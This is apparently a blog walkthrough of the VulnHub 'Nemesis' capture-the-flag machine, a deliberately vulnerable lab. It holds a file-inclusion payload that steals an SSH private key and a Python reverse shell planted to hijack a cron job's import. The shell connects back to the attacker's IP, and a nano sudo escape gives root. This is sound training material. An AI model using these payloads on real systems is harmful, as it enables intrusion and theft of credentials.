Penetration practice: VulnHub range Nemesis
2022-07-01 17:40:00 【It's safe to go to school on Fubo road】
No.28 Nemesis
Target information
Download address:
https://www.vulnhub.com/entry/ia-nemesis-101,582/
Range: VulnHub.com
Target name: IA: Nemesis (1.0.1)
Difficulty: medium to hard
Release date: 25 October 2020
Hint:
This box is meant to improve your Linux privilege escalation and CMS skills. Hope you enjoy it.
Goal: 2 flags
Lab environment
Attacker: VMware Kali, 192.168.7.3
Target: VirtualBox Linux, IP address assigned automatically
Information gathering
Host scan
Scan the LAN for the target's IP address
sudo nmap -sP 192.168.7.1/24
The target host is found at 192.168.7.166
Port scan
Scan the target's open service ports
sudo nmap -sC -sV -p- 192.168.7.166 -oN Nemesis.nmap
Three open ports are found: 80 (http), 52845 (http) and 52846 (SSH). Visit port 80 first.
Web penetration
http://192.168.7.166
The home page shows some hints asking us to find the bug and fix it. Start with a directory scan.
Directory scan
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.7.166 -x php,html,txt,zip
The scan finds contact.php and robots.txt. Download robots.txt and see what it contains.
wget http://192.168.7.166/robots.txt
cat robots.txt
The hint tells us to find the real vulnerability. Now look at what contact.php is.
http://192.168.7.166/contact.php
A normal-looking page, but there are hints in the page source:
a piece of PHP code that takes 3 parameters and echoes one of them. Let's try it.
http://192.168.7.166/contact.php?name=a&email=b&message=ls
http://192.168.7.166/contact.php?name=a&email=b&message=../../../../etc/passwd
Nothing is echoed, so the injection point may not be here. There is some information in the source of the login.html page.
http://192.168.7.166/login.html
It looks like a username, a password and so on; note them down first. There is also a page thanoscarlos.html; visit it.
No useful information there; visit port 52845.
http://192.168.7.166:52845
This is an HTML5 template site. The Contact Us form looks very similar to the hints on the earlier PHP page:
the same 3 parameters. Let's try it.
After submitting, a pop-up says the input was saved to a file. Since a file is involved, this may be a file inclusion; try again.
Local file inclusion vulnerability
After submitting, the contents of passwd appear; look at the page source.
Two users have a login shell. The thanos entry below shows hacker_in_the_town, the same string as on the login.html page. Could it be a password? Try logging in over SSH (one was missed here
ssh thanos@192.168.7.166 -p 52846
Login requires key authentication; try reading the SSH key in the thanos user's home directory.
Payload:
message=../../../../home/thanos/.ssh/id_rsa&submit=
The key file is read successfully; save it and try logging in again.
ssh thanos@192.168.7.166 -p 52846 -i id_rsa
Check what is in the user's home directory
ls -al
cat flag1.txt
There is a backup Python script and flag1.txt; now look at the content of backup.py
cat backup.py
This script backs up the /var/www/html directory to /tmp/website.zip.
There is another user directory, carlos, under /home; accessing it gives permission denied. Look for other leads.
Running sudo -l confirms that hacker_in_the_town is not thanos's password, and there are no usable SUID binaries. Upload pspy64.
Start an HTTP service on the Kali attack machine
python3 -m http.server
Download pspy64 on the target
wget http://192.168.7.3:8000/pspy64
Give pspy64 execute permission and run it
chmod +x pspy64
./pspy64
You can see that a user with UID 1000 runs the backup.py script every minute.
That UID is the carlos user, so this script can be used to escalate privileges. Let's look at the script again.
cat backup.py
It imports zipfile. Python searches the script's own directory before the standard library, so we can create a zipfile.py file in the directory containing backup.py.
On the Kali attack machine:
First listen on port 4444
nc -lvvp 4444
Create the zipfile.py file
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.7.3",4444))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])
Start the HTTP service
python3 -m http.server
Download zipfile.py on the target
wget http://192.168.7.3:8000/zipfile.py
Wait a moment and the target will automatically execute the backup.py script.
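As an added defensive example (not code from this write-up), the Python below audits a scheduled script for the two conditions that made backup.py hijackable: a script directory that other users can write to, and a file in that directory shadowing a standard-library module the script imports. The backup.py and zipfile.py it creates are constructed sample files in a temporary directory.

```python
# Added example, not the write-up's code: audit a scheduled Python script
# for the conditions that made backup.py hijackable. Sample files below are
# constructed in a temporary directory.
import ast
import os
import stat
import tempfile


def imported_modules(script_path):
    """Top-level module names the script imports (static parse, no execution)."""
    with open(script_path, encoding="utf-8") as fh:
        tree = ast.parse(fh.read(), filename=script_path)
    names = set()
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            names.update(alias.name.split(".")[0] for alias in node.names)
        elif isinstance(node, ast.ImportFrom) and node.module and node.level == 0:
            names.add(node.module.split(".")[0])
    return names


def audit_script(script_path):
    """Return findings. Python puts the script's directory first on sys.path,
    so a writable directory plus a same-named .py file hijacks any import."""
    findings = []
    script_dir = os.path.dirname(os.path.abspath(script_path))
    if os.stat(script_dir).st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append(f"directory {script_dir} is group/world writable")
    for name in sorted(imported_modules(script_path)):
        for candidate in (name + ".py", os.path.join(name, "__init__.py")):
            if os.path.exists(os.path.join(script_dir, candidate)):
                findings.append(f"{candidate} shadows module '{name}'")
    return findings


def demo():
    """Constructed layout mirroring the write-up: a backup.py that imports
    zipfile, next to a planted zipfile.py, in a directory anyone can write to."""
    root = tempfile.mkdtemp()
    script = os.path.join(root, "backup.py")
    with open(script, "w") as fh:
        fh.write("import zipfile\n")               # like the real cron job
    with open(os.path.join(root, "zipfile.py"), "w") as fh:
        fh.write("# planted file; imported instead of the stdlib module\n")
    os.chmod(root, 0o777)                          # simulate a writable directory
    return audit_script(script)
```

Running demo() returns one finding for the writable directory and one for the shadowing file; on a real host, point audit_script at the job's path and fix the directory permissions before anything else.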
Reverse shell received; upgrade to an interactive shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
Press Ctrl+Z to background the shell
stty -a
stty raw -echo;fg
reset
Upgrade complete; see what is in the carlos user's home directory
ls -al
Look at flag2.txt
cat flag2.txt
That is the second flag. Now look at root.txt
cat root.txt
The prompt says the carlos user's password has been encrypted, and the encryption code is stored in encrypt.py. Let's crack the encrypted content; the format is
************FUN********
Let's see what is in the encrypt.py script
cat encrypt.py
The script shows that it is an affine cipher; the ciphertext is
FAJSRWOXLAXDQZAWNDDVLSU
Go to dcode.fr to decode it. When using this site, be sure to wait until the page has fully loaded, otherwise the operation fails.
https://www.dcode.fr/chiffre-affine
The candidate solutions are on the left. Comparing them with the format given earlier, the password is ENCRYPTIONISFUNPASSWORD
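As an added example (not the write-up's encrypt.py), the Python below does what dcode.fr did: it tries all 312 affine keys and keeps only the decryption that matches the ************FUN******** mask from root.txt, which shows why a classical cipher like this gives a stored password no real protection.

```python
# Added example: brute-force an affine cipher using the known-plaintext mask.
# The affine cipher maps letter p to (a*p + b) mod 26 with gcd(a, 26) = 1,
# leaving only 12 * 26 = 312 keys, so trying all of them is instant.
from math import gcd

ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
CIPHERTEXT = "FAJSRWOXLAXDQZAWNDDVLSU"   # ciphertext from encrypt.py in the write-up
MASK = "************FUN********"        # password format given in root.txt


def affine_decrypt(ciphertext, a, b):
    """Invert c = a*p + b (mod 26); requires gcd(a, 26) == 1."""
    a_inv = pow(a, -1, 26)              # modular inverse (Python 3.8+)
    return "".join(ALPHABET[(a_inv * (ALPHABET.index(c) - b)) % 26]
                   for c in ciphertext)


def matches_mask(candidate, mask):
    """True if candidate agrees with mask at every position that is not '*'."""
    return len(candidate) == len(mask) and all(
        m == "*" or m == c for m, c in zip(mask, candidate))


def crack(ciphertext, mask):
    """Return [(a, b, plaintext)] for every key whose decryption fits the mask."""
    hits = []
    for a in range(1, 26):
        if gcd(a, 26) != 1:             # a must be invertible mod 26
            continue
        for b in range(26):
            pt = affine_decrypt(ciphertext, a, b)
            if matches_mask(pt, mask):
                hits.append((a, b, pt))
    return hits


if __name__ == "__main__":
    for a, b, pt in crack(CIPHERTEXT, MASK):
        print(f"a={a:2d} b={b:2d} -> {pt}")
```

Three fixed mask letters already pin down a unique (a, b) here, so the only hit is the password the write-up obtained.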
Use this password to run sudo
sudo -l
Enter the password ENCRYPTIONISFUNPASSWORD
The password is correct, and sudo allows running nano as root
sudo /bin/nano /opt/priv
Ctrl + R
Ctrl + X
Then type: reset; sh 1>&0 2>&0
Nothing appears on screen after typing it, but the privilege escalation has actually succeeded, as running id shows
id
It looks a bit awkward, so use Python to switch to an interactive shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
cd /root
ls
cat root.txt
Got root.txt; the box is done.